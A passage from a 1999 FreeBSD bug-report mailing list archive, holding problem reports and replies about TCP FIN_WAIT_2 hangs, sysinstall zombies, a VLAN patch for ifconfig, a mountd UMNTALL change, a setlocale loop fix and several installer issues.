gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id A00A214CA4; Fri, 5 Nov 1999 06:32:29 -0800 (PST) Message-Id: <19991105143229.A00A214CA4@hub.freebsd.org> Date: Fri, 5 Nov 1999 06:32:29 -0800 (PST) From: br@itchigo.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/14722: TCP connections hangs in FIN_WAIT_2 for >30min Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14722 >Category: kern >Synopsis: TCP connections hangs in FIN_WAIT_2 for >30min >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Nov 5 06:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Bodo Rüskamp >Release: FreeBSD 3.3-STABLE >Organization: Itchigo Communications GmbH >Environment: FreeBSD alice.itchigo.com 3.3-STABLE FreeBSD 3.3-STABLE #2: Sat Oct 16 18:15:10 CEST 1999 roof@alice.itchigo.com:/usr/src/sys/compile/ALICE i386 >Description: A TCP connection hangs in FIN_WAIT_2 after the server process died. The remote machine keeps sending TCP packets so that the TCP socket won't go away. The socket is blocked, and the server cannot restart. Captured output from tcpdump follows. A is the local host, where the server died. B is the remote host, where the connection originated. 15:19:28.851890 A.11110 > B.1720: . ack 1 win 4128 (ttl 246, id 102) 15:19:28.851931 B.1720 > A.11110: . ack 1 win 16680 (DF) (ttl 64, id 59322) 15:20:28.890800 A.11110 > B.1720: . ack 1 win 4128 (ttl 246, id 103) 15:20:28.890830 B.1720 > A.11110: . ack 1 win 16680 (DF) (ttl 64, id 59673) 15:21:28.936971 A.11110 > B.1720: . ack 1 win 4128 (ttl 246, id 104) 15:21:28.936995 B.1720 > A.11110: . ack 1 win 16680 (DF) (ttl 64, id 60213) The server process died at 14:47. >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Nov 5 11:50: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ED87514D58 for ; Fri, 5 Nov 1999 11:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA28283; Fri, 5 Nov 1999 11:50:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from internal.mail.demon.net (internal.mail.demon.net [193.195.224.3]) by hub.freebsd.org (Postfix) with ESMTP id 465E314BF4 for ; Fri, 5 Nov 1999 11:40:37 -0800 (PST) (envelope-from fanf@demon.net) Received: from fanf.eng.demon.net (fanf.eng.demon.net [195.11.55.89]) by internal.mail.demon.net with ESMTP id TAA03596; Fri, 5 Nov 1999 19:39:33 GMT Received: from fanf by fanf.eng.demon.net with local (Exim 3.03 #2) id 11jpCR-000BKs-00 for FreeBSD-gnats-submit@freebsd.org; Fri, 05 Nov 1999 19:39:03 +0000 Message-Id: Date: Fri, 05 Nov 1999 19:39:03 +0000 From: Tony Finch Reply-To: fanf@demon.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/14729: sysinstall doesn't reap zombies Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14729 >Category: bin >Synopsis: when sysinstall is running as init it should reap zombies but doesn't >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Nov 5 11:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Tony Finch >Release: FreeBSD 3.3-STABLE-19990927 i386 >Organization: Demon Internet Ltd. >Environment: FreeBSD-3.3-RELEASE install floppies >Description: While an FTP install was proceeding I switched to the emergency holographic shell on ttyv3 in order to install some non-standard software. I ran its GNU configure script which died partway through because the process table filled. On investigation I found that the process table was full of unreaped zombies with a ppid of 1. >How-To-Repeat: see above (the software was a hacked ssh, but I expect any configure script would have these problems). >Fix: Well, I thought it would be because sysinstall's signal handling is different from init's, but at least regarding SIGCHLD they are the same: they both do nothing. So I don't know. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Nov 5 15:20:42 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 249AF153F0 for ; Fri, 5 Nov 1999 15:20:32 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA43350; Fri, 5 Nov 1999 15:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from ns2.safety.net (biffle-unassigned1.nmia.com [207.66.106.90]) by hub.freebsd.org (Postfix) with ESMTP id C94FD14BF9 for ; Fri, 5 Nov 1999 15:10:47 -0800 (PST) (envelope-from les@safety.net) Received: (from les@localhost) by ns2.safety.net (8.8.7/8.8.8) id QAA29659; Fri, 5 Nov 1999 16:10:11 -0700 (MST) (envelope-from les) Message-Id: <199911052310.QAA29659@ns2.safety.net> Date: Fri, 5 Nov 1999 16:10:11 -0700 (MST) From: les@safety.net Reply-To: les@safety.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/14731: Changes to /sbin/ifconfig to support vlan interface configuration Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14731 >Category: bin >Synopsis: The kernel has vlan support but ifconfig won't config it >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Nov 5 15:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Les Biffle >Release: FreeBSD 3.3-RELEASE i386 >Organization: Network Safety Corporation >Environment: All 3.3 platforms, I would guess >Description: There is vlan support in the ethernet stack, but the function in ifconfig required to associate a vlan interface with its parent interface and to specify the vlan number for the 802.1Q tag is not present. >How-To-Repeat: Not applicable >Fix: I'm attaching context diffs for /usr/src/sbin/ifconfig/ifconfig.c and the matching man page. These changes add a "parent" parameter to the ifconfig command to configure the vlan interface for operation. Context diff to add "parent" parameter. ====== cut ====== cut ====== cut ====== cut ====== cut ====== cut ====== *** ifconfig.c Fri Nov 5 11:44:00 1999 --- nifconfig.c Fri Nov 5 11:48:18 1999 *************** *** 53,58 **** --- 53,60 ---- #include #include + #include + #include #include #include #include *************** *** 94,103 **** --- 96,108 ---- struct ifreq ifr, ridreq; struct ifaliasreq addreq; + struct vlanreq vlr; struct sockaddr_in netmask; struct netrange at_nr; /* AppleTalk net range */ char name[32]; + char parent[32]; + int tag; int flags; int metric; int mtu; *************** *** 125,130 **** --- 130,136 ---- c_func setifaddr, setifbroadaddr, setifdstaddr, setifnetmask; c_func setifipdst; c_func setifflags, setifmetric, setifmtu; + c_func setparent; #define NEXTARG 0xffffff *************** *** 151,156 **** --- 157,163 ---- #endif { "netmask", NEXTARG, setifnetmask }, { "range", NEXTARG, setatrange }, + { "parent", NEXTARG, setparent }, { "phase", NEXTARG, setatphase }, { "metric", NEXTARG, setifmetric }, { "broadcast", NEXTARG, setifbroadaddr }, *************** *** 670,675 **** --- 677,708 ---- } void + setparent(val, dummy, s, afp) + const char *val; + int dummy __unused; + int s; + const struct afswtch *afp; + { + char *cp; + + ifr.ifr_data = (caddr_t)&vlr; + if (ioctl(s, SIOCGETVLAN, (caddr_t)&ifr) < 0) + warn("ioctl (SIOCGETVLAN)"); + + strncpy(parent, val, sizeof (parent)); + if ((cp = strchr(parent, ':')) == (char *)NULL) { + Perror("format"); + } + *cp++ = '\0'; + + strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); + strncpy(vlr.vlr_parent, parent, sizeof (vlr.vlr_parent)); + vlr.vlr_tag = atoi(cp); + if (ioctl(s, SIOCSETVLAN, (caddr_t)&ifr) < 0) + warn("ioctl (set parent)"); + } + + void setifmtu(val, dummy, s, afp) const char *val; int dummy __unused; *************** *** 738,743 **** --- 771,785 ---- printf(" metric %d", metric); if (mtu) printf(" mtu %d", mtu); + if (!strncmp(name, "vlan", 4)) { + ifr.ifr_data = (caddr_t)&vlr; + if (ioctl(s, SIOCGETVLAN, (caddr_t)&ifr) < 0) { + warn("ioctl (SIOCGETVLAN)"); + } + if (strlen(vlr.vlr_parent)) + printf(" parent %s:%d", vlr.vlr_parent, vlr.vlr_tag); + + } putchar('\n'); while (addrcount > 0) { ====== cut ====== cut ====== cut ====== cut ====== cut ====== cut ====== Context diff to add parent parameter to man page: ====== cut ====== cut ====== cut ====== cut ====== cut ====== cut ====== *** ifconfig.8 Fri Nov 5 11:51:44 1999 --- nifconfig.8 Fri Nov 5 12:02:48 1999 *************** *** 32,38 **** .\" From: @(#)ifconfig.8 8.3 (Berkeley) 1/5/94 .\" $FreeBSD: src/sbin/ifconfig/ifconfig.8,v 1.18.2.1 1999/08/29 15:13:39 peter Exp $ .\" ! .Dd February 13, 1996 .Dt IFCONFIG 8 .Os BSD 4.2 .Sh NAME --- 32,38 ---- .\" From: @(#)ifconfig.8 8.3 (Berkeley) 1/5/94 .\" $FreeBSD: src/sbin/ifconfig/ifconfig.8,v 1.18.2.1 1999/08/29 15:13:39 peter Exp $ .\" ! .Dd November 5, 1999 .Dt IFCONFIG 8 .Os BSD 4.2 .Sh NAME *************** *** 261,266 **** --- 261,275 ---- .\" for .\" .Tn AFI .\" 37 type addresses. + .It Cm parent Ar parent-interface:tag + .\" (Inet and ISO) + Assign a VLAN interface to a parent interface and specify the 802.1Q tag + that identifies the particular VLAN within the parent interface. For + example, "ifconfig vlan0 parent fxp0:3" will flag vlan interface vlan0 + as VLAN 3 on the fxp0 interface. Packets transmitted and received via + vlan0 will have an 802.1Q tag containing "3" between the normal ethernet + header and the payload, and vlan0 will assume the hardware address of + interface fxp0. .It Cm range Under appletalk, set the interface to respond to a .Em netrange. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Nov 5 15:30:59 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2708914BF8; Fri, 5 Nov 1999 15:30:52 -0800 (PST) (envelope-from ken@FreeBSD.org) Received: (from ken@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA44040; Fri, 5 Nov 1999 15:30:52 -0800 (PST) (envelope-from ken@FreeBSD.org) Date: Fri, 5 Nov 1999 15:30:52 -0800 (PST) From: Message-Id: <199911052330.PAA44040@freefall.freebsd.org> To: ken@FreeBSD.org, freebsd-bugs@FreeBSD.org, mjacob@FreeBSD.org Subject: Re: kern/14721: Kernel fails to compile with isp0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Kernel fails to compile with isp0 Responsible-Changed-From-To: freebsd-bugs->mjacob Responsible-Changed-By: ken Responsible-Changed-When: Fri Nov 5 15:29:55 PST 1999 Responsible-Changed-Why: Matt's driver. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Nov 5 22:10: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EBB2814BE9 for ; Fri, 5 Nov 1999 22:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA72057; Fri, 5 Nov 1999 22:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id CB63A14BD0; Fri, 5 Nov 1999 22:04:15 -0800 (PST) Message-Id: <19991106060415.CB63A14BD0@hub.freebsd.org> Date: Fri, 5 Nov 1999 22:04:15 -0800 (PST) From: ota@drexel.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: bin/14736: Probelm of dd with a protected floppy disk Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14736 >Category: bin >Synopsis: Probelm of dd with a protected floppy disk >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Nov 5 22:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Yoshihiro Ota >Release: Release 3.2 >Organization: Drexel University >Environment: FreeBSD earth.advok.com 3.2-RELEASE FreeBSD 3.2-RELEASE #9: Thu Oct 7 22:27:15 EDT 1999 root@earth.advok.com:/usr/src/sys/compile/MyKernel i386 >Description: When dd tries to wrote to a protected floppy, the system crashes. >How-To-Repeat: Normal operation with a write-protected floppy: dd if=boot.img of=/dev/fd0 >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Nov 6 2:23:33 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7D57514CAE; Sat, 6 Nov 1999 02:23:32 -0800 (PST) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA83660; Sat, 6 Nov 1999 02:23:32 -0800 (PST) (envelope-from phk@FreeBSD.org) Date: Sat, 6 Nov 1999 02:23:32 -0800 (PST) From: Message-Id: <199911061023.CAA83660@freefall.freebsd.org> To: ota@drexel.edu, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/14736: Probelm of dd with a protected floppy disk Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Probelm of dd with a protected floppy disk State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Sat Nov 6 02:22:54 PST 1999 State-Changed-Why: You should have used the raw device: /dev/rfd0. The underlying problem is well documented in other PRs. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Nov 6 2:26:19 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A607614F69; Sat, 6 Nov 1999 02:26:13 -0800 (PST) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA83886; Sat, 6 Nov 1999 02:26:13 -0800 (PST) (envelope-from phk@FreeBSD.org) Date: Sat, 6 Nov 1999 02:26:13 -0800 (PST) From: Message-Id: <199911061026.CAA83886@freefall.freebsd.org> To: mjacob@feral.com, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14486: repeated arrival/departure of disks leads to panic in dscheck Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: repeated arrival/departure of disks leads to panic in dscheck State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Sat Nov 6 02:26:05 PST 1999 State-Changed-Why: fixed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Nov 6 2:27: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1A9E414CAE; Sat, 6 Nov 1999 02:27:03 -0800 (PST) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA83970; Sat, 6 Nov 1999 02:27:03 -0800 (PST) (envelope-from phk@FreeBSD.org) Date: Sat, 6 Nov 1999 02:27:03 -0800 (PST) From: Message-Id: <199911061027.CAA83970@freefall.freebsd.org> To: zsokolsk@peddie.org, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14603: cannot install distribution "Local" from cd or ftp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: cannot install distribution "Local" from cd or ftp State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Sat Nov 6 02:26:35 PST 1999 State-Changed-Why: The distribution "local" has nothing to do with the "local network". To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Nov 6 5:40: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2FC7B14D6F for ; Sat, 6 Nov 1999 05:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA95796; Sat, 6 Nov 1999 05:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sat, 6 Nov 1999 05:40:01 -0800 (PST) Message-Id: <199911061340.FAA95796@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Martin Blapp Subject: Re: bin/14709: umountall requests possibly mishandled by mountd(8) Reply-To: Martin Blapp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/14709; it has been noted by GNATS. From: Martin Blapp To: freebsd-gnats-submit@freebsd.org, cjc@cc942873-a.ewndsr1.nj.home.com Cc: Subject: Re: bin/14709: umountall requests possibly mishandled by mountd(8) Date: Sat, 06 Nov 1999 12:57:40 +0000 From RFC 1813 : --------------- 5.2.4 Procedure 4: UMNTALL - Remove all mount entries SYNOPSIS void MOUNTPROC3_UMNTALL(void) = 4; DESCRIPTION Procedure UMNTALL removes all of the mount entries for this client previously recorded by calls to MNT. AUTH_UNIX authentication or better is required. IMPLEMENTATION This procedure should be used by clients when they are recovering after a system shutdown. If the client could not successfully unmount all of its file systems before being shutdown or the client crashed because of a software or hardware problem, there may be servers which still have mount entries for this client. This is an easy way for the client to inform all servers at once that it does not have any mounted file systems. However, since this procedure is generally implemented using broadcast RPC, it is only of limited usefullness. ERRORS There are no MOUNT protocol errors which can be returned from this procedure. However, RPC errors may be returned for authentication or other RPC failures. ---------------------------------------------------------------- Imagine we have three hosts in our little network: A: big server, has nfs-server running. B: little server, has nfs-client and a nfs-server running. C: workstation, has only nfs-clients. One can make the following conclusions: 1. If 'B' has mounted some filesystems from 'A', and 'B' is being rebooted, mountd(8) from 'B' sends a broadcast RPC_UMNTALL. The mountd(8) from 'A' should recieve it and should remove all entries of host 'B' from /var/db/mountdtab. It seems that our implementation of rpc.mountd sends the RPC_UMNTALL on a unprivileged port. If mountd(8) on 'A' is started with '-n', the RPC_UMNTALL is successful. I'll have to look at this today. 2. Running a NFS-Client does not mean we have a running NFS- Server on the host. This is the setup for most workstations. If we shutdown 'C', 'B' doesn't get informed and can not clean it's /var/db/mountdtab. 3. As stated in the RFC, use of broadcast RPC is only of limited usefullness. 4. The _only_ place where a RPC_UMNTALL call does make any sense is _after_ reboot, but _before_ any new nfs-mounts. ---------------------------------------------------------------- I propose the following changes to *BSD* : ------------------------------------------ 1. To have two mounttabs in /var/db/: /var/db/mountdtab (only for mountd) /var/db/mounttab (for mount_nfs(8), umount(8)) In /var/db/mounttab we record all mounted nfs-mounts, and if we unmount them, we remove the entrys. 2. Add a command which calls RPC_UMNTALL for all entrys in /var/db/mounttab during startup before any NFS-mount. Remember: all remaining entries in /var/db/mounttab are 'not properly unmounted nfs-mounts'. 3. Do not use broadcast RPC anymore, so we can have a time- out control. We can also use a function like pingnfsserver() from mount_nfs(8). 4. the following patch to mountd(8) Index: src/sbin/mountd/mountd.c =================================================================== RCS file: /usr/home/ncvs/src/sbin/mountd/mountd.c,v retrieving revision 1.37 diff -u -r1.37 mountd.c --- mountd.c 1999/10/06 18:20:44 1.37 +++ mountd.c 1999/11/06 11:59:55 @@ -193,8 +193,6 @@ void parsecred __P((char *, struct ucred *)); int put_exlist __P((struct dirlist *, XDR *, struct dirlist *, int *)); int scan_tree __P((struct dirlist *, u_int32_t)); -void send_umntall __P((void)); -int umntall_each __P((caddr_t, struct sockaddr_in *)); static void usage __P((void)); int xdr_dir __P((XDR *, char *)); int xdr_explist __P((XDR *, caddr_t)); @@ -313,7 +311,6 @@ signal(SIGQUIT, SIG_IGN); } signal(SIGHUP, (void (*) __P((int))) get_exportlist); - signal(SIGTERM, (void (*) __P((int))) send_umntall); { FILE *pidfile = fopen(_PATH_MOUNTDPID, "w"); if (pidfile != NULL) { fprintf(pidfile, "%d\n", getpid()); @@ -2081,26 +2078,6 @@ } fprintf(mlfile, "%s %s\n", mlp->ml_host, mlp->ml_dirp); fclose(mlfile); -} - -/* - * This function is called via. SIGTERM when the system is going down. - * It sends a broadcast RPCMNT_UMNTALL. - */ -void -send_umntall() -{ - (void) clnt_broadcast(RPCPROG_MNT, RPCMNT_VER1, RPCMNT_UMNTALL, - xdr_void, (caddr_t)0, xdr_void, (caddr_t)0, umntall_each); - exit(0); -} - -int -umntall_each(resultsp, raddr) - caddr_t resultsp; - struct sockaddr_in *raddr; -{ - return (1); } /* This would solve all the strange error-messages we have seen from mountd(8) and leads also to proper handling of /var/db/mountdtab. Martin Blapp Improware AG, Pratteln, Switzerland To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Nov 6 7: 0: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B9A9814D14 for ; Sat, 6 Nov 1999 07:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA51722; Sat, 6 Nov 1999 07:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 77D8A14C49; Sat, 6 Nov 1999 06:58:37 -0800 (PST) Message-Id: <19991106145837.77D8A14C49@hub.freebsd.org> Date: Sat, 6 Nov 1999 06:58:37 -0800 (PST) From: peter@wahoo.com.tw To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/14742: setlocale function call can't terminate Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14742 >Category: misc >Synopsis: setlocale function call can't terminate >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Nov 6 07:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Peter Hung >Release: FreeBSD-Current >Organization: >Environment: FreeBSD phantom.wahoo.com.tw 4.0-CURRENT FreeBSD 4.0-CURRENT #0: >Description: >How-To-Repeat: >Fix: Increase variable 'i' in while loop. --- /usr/src/lib/libc/locale/setlocale.c Sat Aug 28 07:59:58 1999 +++ setlocale.c Sat Nov 6 17:52:05 1999 @@ -169,9 +169,11 @@ ++locale; while (*++r && *r != '/'); } while (*locale); - while (i < _LC_LAST) + while (i < _LC_LAST) { (void)strcpy(new_categories[i], new_categories[i-1]); + ++i; + } } } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Nov 6 7:40: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8DBEA14D2C for ; Sat, 6 Nov 1999 07:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA53920; Sat, 6 Nov 1999 07:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id D6DD414BE0; Sat, 6 Nov 1999 07:35:44 -0800 (PST) Message-Id: <19991106153544.D6DD414BE0@hub.freebsd.org> Date: Sat, 6 Nov 1999 07:35:44 -0800 (PST) From: jay.krell@cornell.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/14746: xf86config shell script leaves arrow keys broken in /stand/sysinstall Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14746 >Category: misc >Synopsis: xf86config shell script leaves arrow keys broken in /stand/sysinstall >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Nov 6 07:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Jay Krell >Release: 3.3 >Organization: >Environment: Windows NT 4.0/i386, sorry.. >Description: xf86config shell script leaves arrow keys broken in /stand/sysinstall. >How-To-Repeat: Install clean from the 3.3 BSD. Install X. Use the xf86config shell script to configure X, when offer the choice. >Fix: Workaround: use the friendlier XF86Config graphical program instead. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Nov 6 8: 0: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8510314E2D for ; Sat, 6 Nov 1999 08:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA54572; Sat, 6 Nov 1999 08:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id E0C5B14C30; Sat, 6 Nov 1999 07:57:32 -0800 (PST) Message-Id: <19991106155732.E0C5B14C30@hub.freebsd.org> Date: Sat, 6 Nov 1999 07:57:32 -0800 (PST) From: jay.krell@cornell.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/14747: can't install docs 'cause lynx isn't there Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14747 >Category: misc >Synopsis: can't install docs 'cause lynx isn't there >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Nov 6 08:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Jay Krell >Release: 3.3 >Organization: >Environment: sorry, running NT.. >Description: Multiple times I selected to install documentation from 3.3 /stand/sysinstall, and it always told me it couldn't because something like "lynx not in index". >How-To-Repeat: Clean install of 3.3, attempt to install "documentation", I don't remember where the option is. >Fix: workarounds: use man pages instead..get a net connection and browse the online copy, buy the Lehey book >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Nov 6 13:20: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5288114C40 for ; Sat, 6 Nov 1999 13:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA73799; Sat, 6 Nov 1999 13:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sat, 6 Nov 1999 13:20:02 -0800 (PST) Message-Id: <199911062120.NAA73799@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Kenneth D. Merry" Subject: Re: i386/14372: The audio ioctl SNDCTL_DSP_SETFMT affects the stereo setting Reply-To: "Kenneth D. Merry" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR i386/14372; it has been noted by GNATS. From: "Kenneth D. Merry" To: pantzer@ludd.luth.se Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: i386/14372: The audio ioctl SNDCTL_DSP_SETFMT affects the stereo setting Date: Sat, 6 Nov 1999 14:18:57 -0700 (MST) pantzer@ludd.luth.se wrote... > > >Number: 14372 > >Category: i386 > >Synopsis: The audio ioctl SNDCTL_DSP_SETFMT affects the stereo setting > >Confidential: no > >Severity: serious > >Priority: medium > >Responsible: freebsd-bugs > >State: open > >Quarter: > >Keywords: > >Date-Required: > >Class: sw-bug > >Submitter-Id: current-users > >Arrival-Date: Sun Oct 17 08:10:01 PDT 1999 > >Closed-Date: > >Last-Modified: > >Originator: Mattias Pantzare > >Release: FreeBSD 4.0-CURRENT i386 > >Organization: > >Environment: > > FreeBSD-current from 991017. > Soundcad supported by pcm. > > 